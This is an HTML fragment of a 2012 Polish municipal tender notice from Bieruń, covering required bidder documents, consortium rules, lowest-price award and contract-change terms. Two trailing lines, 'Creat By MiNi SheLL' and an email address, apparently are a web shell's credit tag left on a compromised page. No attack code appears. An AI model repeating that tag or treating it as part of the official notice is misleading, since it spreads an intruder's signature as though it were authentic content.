<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>A)Wykonawca przystępujący do postępowania złoży następujące oświadczenia:
1)	Oświadczenie z art. 22 ust. 1 ustawy pzp, że :
1.	posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2.	posiada wiedzę i doświadczenie do wykonania zamówienia; 
3.	dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
4.	znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie  zamówienia.
 Wszystkie oświadczenia muszą być złożone w oryginale i podpisane przez osobę (osoby) uprawnione do zaciągania zobowiązań w imieniu wykonawcy. Jeżeli wykonawca reprezentowany jest w postępowaniu przez pełnomocnika do oferty należy załączyć  pełnomocnictwo, w formie oryginału lub notarialnie poświadczonej kopii. 
B) 1.	Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej    
       dostarcza oświadczenia i dokumenty wymienione w pkt. Lista wymaganych oświadczeń   
       oraz  w pkt. Lista wymaganych dokumentów.

       Zamiast dokumentów, o których mowa w punktach  3, 4 i 5 Listy wymaganych dokumentów  
       przedstawia dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce 
       zamieszkania, potwierdzające odpowiednio, że:
       a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
       b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne 
           albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych 
           płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
       c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
Dokumenty, o których mowa powyżej, z wyjątkiem dokumentu z pkt 1b) powinny być wystawione 
nie wcześniej niż 6 miesięcy przed upływem, przed upływem terminu składania ofert.
       Dokument z pkt 1 b) powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem    
       terminu składania ofert.
       Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce 
       zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je
       dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem    
       sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego 
       odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce 
       zamieszkania.
       Termin ważności oświadczeń jest taki sam, jak dotyczący dokumentów, o których mowa w pkt 1
        niniejszej uwagi.
      2)  Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
    3)  W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku                                  podmiotów, o których mowa w § 1 ust. 2 i 3 w/w rozporządzenia, kopie dokumentów dotyczących odpowiednio wykonawcy lub podmiotów są poświadczane za zgodność z oryginałem przez wykonawcę lub te podmioty.
    4) Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach          zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów,   niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej  sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami   niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
       Treść zobowiązania podmiotu trzeciego złożonego w oryginale, powinna określać:
         -  kto jest podmiotem przyjmującym zasoby,
         -  zakres zobowiązania podmiotu trzeciego,
         -  czego dotyczy zobowiązanie,
         -  w jaki sposób będzie zobowiązanie wykonane,
         -  jakiego okresu dotyczy zobowiązanie.
     5) Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów     dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może    przedstawić inny dokument, który w wystarczający sposób potwierdza spełnienie opisanego przez zamawiającego warunku.

     6) Podmioty występujące wspólnie
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. konsorcjum/  
     	 spółki cywilnej) do oferty należy dołączyć : 
a)	Pełnomocnictwo  określające zasady reprezentacji ze wskazaniem pełnomocnika ( lidera),  jego zakresu działania  i   uprawnień do reprezentowania wykonawców w postępowaniu 
o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy. 
Pełnomocnictwo  winno zawierać, w szczególności  :
- nazwy wszystkich wykonawców  wspólnie ubiegający się o realizację  zamówienia  
i   udzielających pełnomocnictwa, 
- 	nazwę firmy Pełnomocnika/Lidera,
- zakres działania Pełnomocnika/Lidera, uprawnień do reprezentowania wykonawców 
w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu 
i zawarcia umowy, 
- 	czas trwania ( zawiązania umowy wykonawców wspólnie ubiegających się o udzielenie    zamówienia tzn. co najmniej okres obejmujący realizację zamówienia),
- 	cel zawarcia ( wspólną realizację zamówienia publicznego),
-	datę udzielenia pełnomocnictwa,
-  podpisy wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia,  zgodne z zasadą ich reprezentacji.
Pełnomocnictwo należy załączyć w formie oryginału lub notarialnie poświadczonej kopii. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem / Liderem. 
   b) Oświadczenia wymienione w pkt. V.A SIWZ powinny być złożone w taki sposób, aby warunki ,                 
       o których mowa w pkt. IV SIWZ, wykonawcy występujący wspólnie spełnili    łącznie.
   c) Dokumenty wymienione w pkt. V B ppkt. 1 i 2 Lista wymaganych dokumentów  powinny być     
       złożone   w taki sposób, aby warunki o których mowa w pkt. IV SIWZ, wykonawcy występujący 
       wspólnie spełnili łącznie.
       d) Dokumenty wymienione w pkt. V B ppkt. 3,4,5 i 6 Listy wymaganych dokumentów .składa każdy                     
            z wykonawców wchodzących w skład podmiotu występującego wspólnie.
        e) Kopie dokumentów dotyczących wykonawcy powinny być poświadczane za zgodność z   
           oryginałem przez wykonawcę, którego dokument dotyczy lub przez lidera lub przez wszystkich 
           wykonawców wchodzących w skład tego podmiotu.
        f) Zgodnie z art. 141 ustawy pzp, wykonawcy wspólnie ubiegający się o udzielenie zamówienia    
           ponoszą solidarną odpowiedzialność za wykonanie umowy.
C)Do oferty zaleca się załączyć informacje  w zakresie części zamówienia, które zostaną 
powierzone podwykonawcom. W przypadku braku złożenia informacji w tym zakresie, zamawiający uzna, że wykonawca wykona całość zamówienia sam bez powierzenia części zamówienia podwykonawcom.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania zmiany postanowień umowy w zakresie:
a.  wartości umownej, w przypadku wprowadzenia zmian VAT, który będzie naliczany zgodnie                  
     z obowiązującą stawką; 
b.  zmiany osób, które będą uczestniczyć w wykonywaniu przedmiotu umowy z zachowaniem  
     wymagań określonych w SIWZ, jakie osoby te powinny spełniać; 
            c.  zmiany terminu rozpoczęcia lub zakończenia wykonania przedmiotu umowy, w szczególności  
                zmiany terminów wykonywania robót budowlanych z powodu: niesprzyjających warunków
 atmosferycznych, zmiany przepisów, okoliczności, których nie można było przewidzieć przy 
                udzielaniu zamówienia, siły wyższej, wystąpienia środków ochrony prawnej w postępowaniu
                o zamówienie publiczne;
d.  mającym wpływ na realizację przedmiotu umowy, w przypadku gdy nastąpi zmiana       
     powszechnie obowiązujących przepisów prawa; 
e.  zmiany podwykonawcy lub powierzenia podwykonawcy całego lub części zakresu zamówienia  
     w przypadku wystąpienia okoliczności, których nie można było przewidzieć na etapie 
     sporządzania oferty; 
f.   innych zmian, których nie można było przewidzieć na etapie sporządzania SIWZ, a które nie 
     wykraczają poza zakres art. 140 ustawy Prawo zamówień publicznych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bierun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Bieruniu - Referat Zamówień Publicznych 43-150 Bieruń, ul. Rynek 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.10.2012 godzina 10:00, miejsce: Urząd Miejski w Bieruniu - SEKRETARIAT ( pok. nr. 9, I piętro, segment A) 43-150 Bieruń, ul. Rynek 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu                                     Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego                                    Województwa Śląskiego na lata 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com